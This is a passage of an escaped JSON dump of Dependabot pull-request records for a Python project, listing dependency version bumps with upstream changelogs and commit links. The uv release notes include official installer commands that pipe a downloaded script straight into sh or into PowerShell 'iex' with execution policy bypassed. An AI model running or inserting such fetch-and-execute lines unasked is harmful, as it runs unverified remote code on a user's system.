--\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f39ea903ba49eb5a0b2c6723c9a929b41ed4a0f1\"\u003e\u003ccode\u003ef39ea90\u003c/code\u003e\u003c/a\u003e Release 3.18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/40f4e407bc7452da37c24b0c112dcda9a5b299ba\"\u003e\u003ccode\u003e40f4e40\u003c/code\u003e\u003c/a\u003e Pre-release 3.18rc0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1a5bf80f2fa40454589e6144efe5f72015ef9d24\"\u003e\u003ccode\u003e1a5bf80\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/253\"\u003e#253\u003c/a\u003e from kjd/lenient-decode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5bbb26fc86e28c4ee1434ae8ae8db76de4c2a5ac\"\u003e\u003ccode\u003e5bbb26f\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into lenient-decode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c532bae5270489cef8faf9f6b1eb70cbcb454c6d\"\u003e\u003ccode\u003ec532bae\u003c/code\u003e\u003c/a\u003e Rename decode() lenient= option to display= (issue \u003ca href=\"https://redirect.github.com/kjd/idna/issues/248\"\u003e#248\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0b1758ba11952a2e88fd6141ffa620409bff0580\"\u003e\u003ccode\u003e0b1758b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/252\"\u003e#252\u003c/a\u003e from kjd/release-3.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f48619c4cea6859b938d560fdd9feb898e678567\"\u003e\u003ccode\u003ef48619c\u003c/code\u003e\u003c/a\u003e Release 3.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/7421ba8003227f816142ab40178e3a7d204e6847\"\u003e\u003ccode\u003e7421ba8\u003c/code\u003e\u003c/a\u003e Pre-release 3.17rc0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/22ebb73b164081f209449b50162eb7ce086e96a4\"\u003e\u003ccode\u003e22ebb73\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/251\"\u003e#251\u003c/a\u003e from kjd/structure-optimizations\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/2a7ac0a58c788d50112a5003af545a83807fb108\"\u003e\u003ccode\u003e2a7ac0a\u003c/code\u003e\u003c/a\u003e Drop redundant parallel-arrays comment from uts46data\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v3.11...v3.18\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ipython` from 9.12.0 to 9.14.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/352c35b9e841fe20c2a0dc09af67e180e6854322\"\u003e\u003ccode\u003e352c35b\u003c/code\u003e\u003c/a\u003e release 9.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/df72b1f8d94e874947f6425dbbcca614942aa3f5\"\u003e\u003ccode\u003edf72b1f\u003c/code\u003e\u003c/a\u003e Add forward compatibility for pdb.Pdb's mode argument (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15235\"\u003e#15235\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/a957d81c3177d33fc9d0b5fe123e58dd8cbf87e7\"\u003e\u003ccode\u003ea957d81\u003c/code\u003e\u003c/a\u003e Handle pdb.Pdb \u003ccode\u003emode\u003c/code\u003e argument and test signature compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/3e1c0544e141d55cd232259d4828a633e952f5fc\"\u003e\u003ccode\u003e3e1c054\u003c/code\u003e\u003c/a\u003e ci: add zizmor GitHub Actions security analysis and harden workflows (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15238\"\u003e#15238\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/0181ae38b68b929f464c349ad139e1080ee60a93\"\u003e\u003ccode\u003e0181ae3\u003c/code\u003e\u003c/a\u003e ci: add zizmor GitHub Actions security analysis and harden workflows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/fb831cc06fe27a12f5d52f6608fa90857428748c\"\u003e\u003ccode\u003efb831cc\u003c/code\u003e\u003c/a\u003e back to dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/9d1f24b9687279362b66f4e8c8a36ffde895a05d\"\u003e\u003ccode\u003e9d1f24b\u003c/code\u003e\u003c/a\u003e release 9.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/d8b9d11f2796300d914a88dc08de35ce93bc5aa0\"\u003e\u003ccode\u003ed8b9d11\u003c/code\u003e\u003c/a\u003e Add IPython 9.14 release notes (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15228\"\u003e#15228\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/80cc1b963349ebc472b69f7da505cccebb2e6ad5\"\u003e\u003ccode\u003e80cc1b9\u003c/code\u003e\u003c/a\u003e Apply suggestions from code review\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/99feaadc543d43abc9287734651f4b618305a6bb\"\u003e\u003ccode\u003e99feaad\u003c/code\u003e\u003c/a\u003e Prepare release notes for 9.14\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ipython/ipython/compare/9.12.0...9.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jedi` from 0.19.2 to 0.20.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/davidhalter/jedi/blob/master/CHANGELOG.rst\"\u003ejedi's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e0.20.0 (2026-05-02)\n+++++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePython 3.14 support\u003c/li\u003e\n\u003cli\u003eRemoved support for Python 3.8 and 3.9\u003c/li\u003e\n\u003cli\u003eUpgraded Typeshed\u003c/li\u003e\n\u003cli\u003eBetter support for Final/ClassVar\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e__new__\u003c/code\u003e is now also recognized as a signature and TypeVar inference\u003c/li\u003e\n\u003cli\u003eSupport for \u003ccode\u003eSelf\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSupport for \u003ccode\u003eTypeAlias\u003c/code\u003e, generics for \u003ccode\u003etype[...]\u003c/code\u003e and \u003ccode\u003etuple[...]\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/3102215478fe07b965dcd8221c17436d1dd7e8ac\"\u003e\u003ccode\u003e3102215\u003c/code\u003e\u003c/a\u003e Move the type parameter syntax tests so that it works for all versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/1b37f2eb946e825cbc2887c6dd34ee046f0ae68c\"\u003e\u003ccode\u003e1b37f2e\u003c/code\u003e\u003c/a\u003e Prepare for the 0.20.0 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/8e4df5cc0ec511db1af6d358182b1fb7c1e0cbff\"\u003e\u003ccode\u003e8e4df5c\u003c/code\u003e\u003c/a\u003e Make sure the new generic syntax does not fail with latest parso\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/4c9dbcca0329454b638bfa32e2825bedcfdf0eac\"\u003e\u003ccode\u003e4c9dbcc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/davidhalter/jedi/issues/2098\"\u003e#2098\u003c/a\u003e from davidhalter/updates\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/fedb1a5eb0d74446f6d431db2920ab5f1e1d5b18\"\u003e\u003ccode\u003efedb1a5\u003c/code\u003e\u003c/a\u003e Fix 3.10 tests in one more case\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/87e782f9c82de7297e243a770ac8888570bffa8e\"\u003e\u003ccode\u003e87e782f\u003c/code\u003e\u003c/a\u003e Fix flake8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/cd52d982e10ac54f0ebef06e0bd414f79589998a\"\u003e\u003ccode\u003ecd52d98\u003c/code\u003e\u003c/a\u003e Fixes to get the tests passing for 3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/d0b11806d4d1def377234bc2dc512992c997a977\"\u003e\u003ccode\u003ed0b1180\u003c/code\u003e\u003c/a\u003e Finally make tests work for 3.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/8520a9958b489bd8d30cf20b4d2798f7289aab45\"\u003e\u003ccode\u003e8520a99\u003c/code\u003e\u003c/a\u003e Implement support for TypeVar inference for \u003cstrong\u003enew\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/55e5f0cb92dd92d5bdc80ecfc38664a1afd921d1\"\u003e\u003ccode\u003e55e5f0c\u003c/code\u003e\u003c/a\u003e Implement new-style unions with TypeVars\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/davidhalter/jedi/compare/v0.19.2...v0.20.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jiter` from 0.14.0 to 0.15.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/jiter/commit/0bb22aa6b3a4d729e6c7bae74c05a5d0f1f654b0\"\u003e\u003ccode\u003e0bb22aa\u003c/code\u003e\u003c/a\u003e release: 0.15.0 (\u003ca href=\"https://redirect.github.com/pydantic/jiter/issues/251\"\u003e#251\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/jiter/commit/0f3e5eb48a5fff16d825f9af2ea7c6748bbdfbb8\"\u003e\u003ccode\u003e0f3e5eb\u003c/code\u003e\u003c/a\u003e expose \u003ccode\u003eknown_number_bytes\u003c/code\u003e and parser methods for bytes -\u0026gt; number (\u003ca href=\"https://redirect.github.com/pydantic/jiter/issues/250\"\u003e#250\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/pydantic/jiter/compare/v0.14.0...v0.15.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jupyter-events` from 0.12.0 to 0.12.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/jupyter_events/releases\"\u003ejupyter-events's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.12.1\u003c/h2\u003e\n\u003ch2\u003e0.12.1\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_events/compare/v0.12.0...69306b1d1577a1a71ba27a4b12314fa31771ee71\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Bug] Fix empty error messages from failing event listeners \u003ca href=\"https://redirect.github.com/jupyter/jupyter_events/pull/118\"\u003e#118\u003c/a\u003e (\u003ca href=\"https://github.com/Zsailer\"\u003e\u003ccode\u003e@​Zsailer\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance and upkeep improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security.md \u003ca href=\"https://redirect.github.com/jupyter/jupyter_events/pull/113\"\u003e#113\u003c/a\u003e (\u003ca href=\"https://github.com/Carreau\"\u003e\u003ccode\u003e@​Carreau\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003eThe following people contributed discussions, new ideas, code and documentation contributions, and review.\nSee \u003ca href=\"https://github-activity.readthedocs.io/en/latest/use/#how-does-this-tool-define-contributions-in-the-reports\"\u003eour definition of contributors\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_events/graphs/contributors?from=2025-02-03\u0026amp;to=2026-04-20\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/Carreau\"\u003e\u003ccode\u003e@​Carreau\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fjupyter_events+involves%3ACarreau+updated%3A2025-02-03..2026-04-20\u0026amp;type=Issues\"\u003eactivity\u003c/a\u003e) | \u003ca href=\"https://github.com/Zsailer\"\u003e\u003ccode\u003e@​Zsailer\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fjupyter_events+involves%3AZsailer+updated%3A2025-02-03..2026-04-20\u0026amp;type=Issues\"\u003eactivity\u003c/a\u003e)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/jupyter_events/blob/main/CHANGELOG.md\"\u003ejupyter-events's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.12.1\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_events/compare/v0.12.0...69306b1d1577a1a71ba27a4b12314fa31771ee71\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Bug] Fix empty error messages from failing event listeners \u003ca href=\"https://redirect.github.com/jupyter/jupyter_events/pull/118\"\u003e#118\u003c/a\u003e (\u003ca href=\"https://github.com/Zsailer\"\u003e\u003ccode\u003e@​Zsailer\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance and upkeep improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security.md \u003ca href=\"https://redirect.github.com/jupyter/jupyter_events/pull/113\"\u003e#113\u003c/a\u003e (\u003ca href=\"https://github.com/Carreau\"\u003e\u003ccode\u003e@​Carreau\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003eThe following people contributed discussions, new ideas, code and documentation contributions, and review.\nSee \u003ca href=\"https://github-activity.readthedocs.io/en/latest/use/#how-does-this-tool-define-contributions-in-the-reports\"\u003eour definition of contributors\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_events/graphs/contributors?from=2025-02-03\u0026amp;to=2026-04-20\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/Carreau\"\u003e\u003ccode\u003e@​Carreau\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fjupyter_events+involves%3ACarreau+updated%3A2025-02-03..2026-04-20\u0026amp;type=Issues\"\u003eactivity\u003c/a\u003e) | \u003ca href=\"https://...\n\n_Description has been truncated_","html_url":"https://github.com/BryanOwens012/which-glp/pull/190","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/BryanOwens012%2Fwhich-glp/issues/190","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/190/packages"},{"uuid":"4610482800","node_id":"PR_kwDOR-7nxM7jxxc5","number":163,"state":"open","title":"chore(deps-dev): Bump the dev-dependencies group across 1 directory with 28 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-08T06:18:25.000Z","updated_at":"2026-06-08T06:20:50.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps-dev): Bump","group_name":"dev-dependencies","update_count":28,"packages":[{"name":"uv","old_version":"0.11.7","new_version":"0.11.19","repository_url":"https://github.com/astral-sh/uv"},{"name":"ruff","old_version":"0.15.11","new_version":"0.15.16","repository_url":"https://github.com/astral-sh/ruff"},{"name":"ty","old_version":"0.0.31","new_version":"0.0.44","repository_url":"https://github.com/astral-sh/ty"},{"name":"hypothesis","old_version":"6.152.1","new_version":"6.155.2","repository_url":"https://github.com/HypothesisWorks/hypothesis"},{"name":"beautifulsoup4","old_version":"4.14.3","new_version":"4.15.0"},{"name":"mutmut","old_version":"3.5.0","new_version":"3.6.0","repository_url":"https://github.com/boxed/mutmut"},{"name":"pre-commit","old_version":"4.5.1","new_version":"4.6.0","repository_url":"https://github.com/pre-commit/pre-commit"},{"name":"certifi","old_version":"2026.2.25","new_version":"2026.5.20","repository_url":"https://github.com/certifi/python-certifi"},{"name":"coverage","old_version":"7.13.5","new_version":"7.14.1","repository_url":"https://github.com/coveragepy/coveragepy"},{"name":"cyclonedx-python-lib","old_version":"11.7.0","new_version":"11.8.0","repository_url":"https://github.com/CycloneDX/cyclonedx-python-lib"},{"name":"distlib","old_version":"0.4.0","new_version":"0.4.1","repository_url":"https://github.com/pypa/distlib"},{"name":"filelock","old_version":"3.25.2","new_version":"3.29.1","repository_url":"https://github.com/tox-dev/py-filelock"},{"name":"identify","old_version":"2.6.18","new_version":"2.6.19","repository_url":"https://github.com/pre-commit/identify"},{"name":"idna","old_version":"3.11","new_version":"3.18","repository_url":"https://github.com/kjd/idna"},{"name":"mdit-py-plugins","old_version":"0.5.0","new_version":"0.6.1","repository_url":"https://github.com/executablebooks/mdit-py-plugins"},{"name":"packaging","old_version":"26.0","new_version":"26.2","repository_url":"https://github.com/pypa/packaging"},{"name":"pip","old_version":"26.0.1","new_version":"26.1.2","repository_url":"https://github.com/pypa/pip"},{"name":"platformdirs","old_version":"4.9.6","new_version":"4.10.0","repository_url":"https://github.com/tox-dev/platformdirs"},{"name":"pyjwt","old_version":"2.12.1","new_version":"2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"},{"name":"pyopenssl","old_version":"26.0.0","new_version":"26.2.0","repository_url":"https://github.com/pyca/pyopenssl"},{"name":"python-discovery","old_version":"1.2.2","new_version":"1.4.0","repository_url":"https://github.com/tox-dev/python-discovery"},{"name":"requests","old_version":"2.33.1","new_version":"2.34.2","repository_url":"https://github.com/psf/requests"},{"name":"securesystemslib","old_version":"1.3.1","new_version":"1.4.0","repository_url":"https://github.com/secure-systems-lab/securesystemslib"},{"name":"sigstore","old_version":"4.2.0","new_version":"4.3.0","repository_url":"https://github.com/sigstore/sigstore-python"},{"name":"soupsieve","old_version":"2.8.3","new_version":"2.8.4","repository_url":"https://github.com/facelessuser/soupsieve"},{"name":"textual","old_version":"8.2.4","new_version":"8.2.7","repository_url":"https://github.com/Textualize/textual"},{"name":"urllib3","old_version":"2.6.3","new_version":"2.7.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"virtualenv","old_version":"21.2.0","new_version":"21.4.2","repository_url":"https://github.com/pypa/virtualenv"}],"path":null,"ecosystem":"pip"},"body":"Bumps the dev-dependencies group with 28 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [uv](https://github.com/astral-sh/uv) | `0.11.7` | `0.11.19` |\n| [ruff](https://github.com/astral-sh/ruff) | `0.15.11` | `0.15.16` |\n| [ty](https://github.com/astral-sh/ty) | `0.0.31` | `0.0.44` |\n| [hypothesis](https://github.com/HypothesisWorks/hypothesis) | `6.152.1` | `6.155.2` |\n| [beautifulsoup4](https://www.crummy.com/software/BeautifulSoup/bs4/) | `4.14.3` | `4.15.0` |\n| [mutmut](https://github.com/boxed/mutmut) | `3.5.0` | `3.6.0` |\n| [pre-commit](https://github.com/pre-commit/pre-commit) | `4.5.1` | `4.6.0` |\n| [certifi](https://github.com/certifi/python-certifi) | `2026.2.25` | `2026.5.20` |\n| [coverage](https://github.com/coveragepy/coveragepy) | `7.13.5` | `7.14.1` |\n| [cyclonedx-python-lib](https://github.com/CycloneDX/cyclonedx-python-lib) | `11.7.0` | `11.8.0` |\n| [distlib](https://github.com/pypa/distlib) | `0.4.0` | `0.4.1` |\n| [filelock](https://github.com/tox-dev/py-filelock) | `3.25.2` | `3.29.1` |\n| [identify](https://github.com/pre-commit/identify) | `2.6.18` | `2.6.19` |\n| [idna](https://github.com/kjd/idna) | `3.11` | `3.18` |\n| [mdit-py-plugins](https://github.com/executablebooks/mdit-py-plugins) | `0.5.0` | `0.6.1` |\n| [packaging](https://github.com/pypa/packaging) | `26.0` | `26.2` |\n| [pip](https://github.com/pypa/pip) | `26.0.1` | `26.1.2` |\n| [platformdirs](https://github.com/tox-dev/platformdirs) | `4.9.6` | `4.10.0` |\n| [pyjwt](https://github.com/jpadilla/pyjwt) | `2.12.1` | `2.13.0` |\n| [pyopenssl](https://github.com/pyca/pyopenssl) | `26.0.0` | `26.2.0` |\n| [python-discovery](https://github.com/tox-dev/python-discovery) | `1.2.2` | `1.4.0` |\n| [requests](https://github.com/psf/requests) | `2.33.1` | `2.34.2` |\n| [securesystemslib](https://github.com/secure-systems-lab/securesystemslib) | `1.3.1` | `1.4.0` |\n| [sigstore](https://github.com/sigstore/sigstore-python) | `4.2.0` | `4.3.0` |\n| [soupsieve](https://github.com/facelessuser/soupsieve) | `2.8.3` | `2.8.4` |\n| [textual](https://github.com/Textualize/textual) | `8.2.4` | `8.2.7` |\n| [urllib3](https://github.com/urllib3/urllib3) | `2.6.3` | `2.7.0` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `21.2.0` | `21.4.2` |\n\n\nUpdates `uv` from 0.11.7 to 0.11.19\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/uv/releases\"\u003euv's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.11.19\u003c/h2\u003e\n\u003ch2\u003eRelease Notes\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-03.\u003c/p\u003e\n\u003ch3\u003ePython\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd CPython 3.15.0b2 (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19531\"\u003e#19531\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAlways compute SHA256 for remote distributions (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19662\"\u003e#19662\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd PyEmscripten platform (PEP 783) (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19629\"\u003e#19629\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Pyodide 2025 target triple (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19653\"\u003e#19653\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMake preview features for commands have names that aren't ambiguous with the command (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19645\"\u003e#19645\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRespect \u003ccode\u003e--isolated\u003c/code\u003e in \u003ccode\u003euv check\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19666\"\u003e#19666\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eContinue tool uninstall after dangling receipts (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19623\"\u003e#19623\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSkip Unix-specific installation steps when cross-installing Windows Python distributions (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19424\"\u003e#19424\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eInstall uv 0.11.19\u003c/h2\u003e\n\u003ch3\u003eInstall prebuilt binaries via shell script\u003c/h3\u003e\n\u003cpre lang=\"sh\"\u003e\u003ccode\u003ecurl --proto '=https' --tlsv1.2 -LsSf https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-installer.sh | sh\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch3\u003eInstall prebuilt binaries via powershell script\u003c/h3\u003e\n\u003cpre lang=\"sh\"\u003e\u003ccode\u003epowershell -ExecutionPolicy Bypass -c \u0026quot;irm https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-installer.ps1 | iex\u0026quot;\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch2\u003eDownload uv 0.11.19\u003c/h2\u003e\n\u003ctable\u003e\n\u003cthead\u003e\n\u003ctr\u003e\n\u003cth\u003eFile\u003c/th\u003e\n\u003cth\u003ePlatform\u003c/th\u003e\n\u003cth\u003eChecksum\u003c/th\u003e\n\u003c/tr\u003e\n\u003c/thead\u003e\n\u003ctbody\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-aarch64-apple-darwin.tar.gz\"\u003euv-aarch64-apple-darwin.tar.gz\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003eApple Silicon macOS\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-aarch64-apple-darwin.tar.gz.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-x86_64-apple-darwin.tar.gz\"\u003euv-x86_64-apple-darwin.tar.gz\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003eIntel macOS\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-x86_64-apple-darwin.tar.gz.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-aarch64-pc-windows-msvc.zip\"\u003euv-aarch64-pc-windows-msvc.zip\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003eARM64 Windows\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-aarch64-pc-windows-msvc.zip.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-i686-pc-windows-msvc.zip\"\u003euv-i686-pc-windows-msvc.zip\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003ex86 Windows\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-i686-pc-windows-msvc.zip.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca 